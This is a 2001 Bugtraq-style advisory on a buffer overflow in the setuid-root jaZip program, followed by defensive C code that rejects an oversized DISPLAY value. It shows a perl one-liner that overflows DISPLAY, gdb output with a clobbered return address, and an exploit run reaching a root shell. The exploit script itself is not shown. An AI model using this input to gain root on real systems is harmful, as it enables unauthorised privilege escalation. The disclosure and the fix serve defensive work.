Title: Vulnerability in jaZip
Released by: teleh0r
Date: 15th January 2001
Dear Bugtraq,
jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.
Please excuse me if this was known. Please note that I cannot
guarantee that this information is correct.
Tested rpm:
http://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm
[root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
[root@localhost /root]# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
----
[teleh0r@localhost teleh0r]$ rpm -q jaZip
jaZip-0.32-2
[teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#
Exploit attached.
Sincerely yours,
teleh0r
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
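
The crash above is reached through the DISPLAY environment variable of a setuid binary. The jaZip source is not shown on this page, so the C below is an added illustration (not jaZip's or the author's code) of a bounded copy that rejects the 2100-byte value from the report instead of overrunning a fixed buffer. The names copy_env_bounded and DISPLAY_MAX, and the 256-byte limit, are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MAX 256  /* assumed limit for this example, not taken from jaZip */

/* Copy an environment-supplied string into a fixed-size buffer.
 * Returns 0 on success, -1 if the value is missing, empty, or does not fit
 * together with its terminating NUL. dst is always left NUL-terminated. */
int copy_env_bounded(const char *value, char *dst, size_t dstlen)
{
    const char *end;
    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (value == NULL || value[0] == '\0')
        return -1;
    /* Look for the terminator within the first dstlen bytes only. */
    end = memchr(value, '\0', dstlen);
    if (end == NULL)
        return -1;               /* too long: reject, do not truncate silently */
    memcpy(dst, value, (size_t)(end - value) + 1);
    return 0;
}

/* Constructed input matching the report: DISPLAY set to 2100 'A' characters. */
int demo_oversized(void)
{
    char big[2101];
    char display[DISPLAY_MAX];
    memset(big, 'A', 2100);
    big[2100] = '\0';
    return copy_env_bounded(big, display, sizeof display);
}

int main(void)
{
    char display[DISPLAY_MAX];
    /* A setuid program must treat every environment variable as untrusted. */
    if (copy_env_bounded(getenv("DISPLAY"), display, sizeof display) != 0) {
        fprintf(stderr, "DISPLAY missing or longer than %d bytes, refusing\n",
                DISPLAY_MAX - 1);
        return 1;
    }
    printf("DISPLAY accepted: %s\n", display);
    return 0;
}
```

Independently of any code fix, clearing the setuid bit on the installed binary removes the privilege boundary that makes the overflow a path to root.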